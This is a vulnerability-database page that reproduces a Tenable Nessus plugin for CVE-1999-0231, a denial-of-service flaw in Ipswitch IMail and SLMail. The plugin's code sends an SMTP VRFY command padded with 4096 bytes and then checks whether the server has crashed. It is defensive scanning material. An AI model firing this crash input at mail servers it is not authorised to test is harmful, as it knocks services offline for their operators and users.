Lucene search
K

Ipswitch IMail / SLMail VRFY Command Remote Overflow

🗓️ 22 Jun 1999 00:00:00Reported by TenableType 
nessus
 nessus
🔗 www.tenable.com👁 41 Views

Ipswitch IMail and SLMail vulnerable to remote denial of service via long VRFY command.

Related
Refs
Code
ReporterTitlePublishedViews
Family
CVE
CVE-1999-0231
4 Feb 200005:00
cve
Cvelist
CVE-1999-0231
4 Feb 200005:00
cvelist
EUVD
EUVD-1999-0231
7 Oct 202500:30
euvd
NVD
CVE-1999-0231
1 Jan 199905:00
nvd
Positive Technologies
PT-1999-1021 · Seattle +1 · Slmail +1
1 Jan 199900:00
ptsecurity
RedhatCVE
CVE-1999-0231
7 Jan 202609:39
redhatcve
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(10254);
  script_version("1.35");
  script_set_attribute(attribute:"plugin_modification_date", value:"2022/04/11");

  script_cve_id("CVE-1999-0231");

  script_name(english:"Ipswitch IMail / SLMail VRFY Command Remote Overflow");

  script_set_attribute(attribute:"synopsis", value:
"The remote mail server is vulnerable to denial of service.");
  script_set_attribute(attribute:"description", value:
"It was possible to crash the affected SMTP service by sending a VRFY
command with a long argument. 

This attack is known to affect certain versions of Ipswitch IMail and
Seattle Labs' SLMail, although products from other vendors may also be
affected. 

An unauthenticated, remote attacker can leverage this issue to conduct
a denial of service attack against the affected mail server.");
  script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/1998/Mar/93");
  script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/1998/Mar/94");
  script_set_attribute(attribute:"solution", value:
"Contact the product's vendor for an update.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");

  script_set_attribute(attribute:"vuln_publication_date", value:"1998/03/12");
  script_set_attribute(attribute:"plugin_publication_date", value:"1999/06/22");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:ipswitch:imail");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:seattle_lab_software:slmail_pro");
  script_set_attribute(attribute:"thorough_tests", value:"true");
  script_end_attributes();

  script_category(ACT_DENIAL);
  script_family(english:"SMTP problems");

  script_copyright(english:"This script is Copyright (C) 1999-2022 Tenable Network Security, Inc.");

  script_dependencies("find_service1.nasl", "smtpserver_detect.nasl", "sendmail_expn.nasl");
  script_require_ports("Services/smtp", 25);

  exit(0);
}

#
# The script code starts here
#

include("global_settings.inc");
include("misc_func.inc");

port = get_service(svc:"smtp", default: 25, exit_on_fail: 1);
# Note that slmail is also vulnerable on port 27.
if (get_kb_item('SMTP/'+port+'/broken')) exit(0);

soc = open_sock_tcp(port);
if (! soc) exit(1);

data = strcat('VRFY ', crap(4096), '\r\n');
send(socket:soc, data:data);
close(soc);

if (service_is_dead(port: port) > 0)
  security_warning(port);

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

11 Apr 2022 00:00Current
5.5Medium risk
Vulners AI Score5.5
CVSS 25
EPSS0.00497
41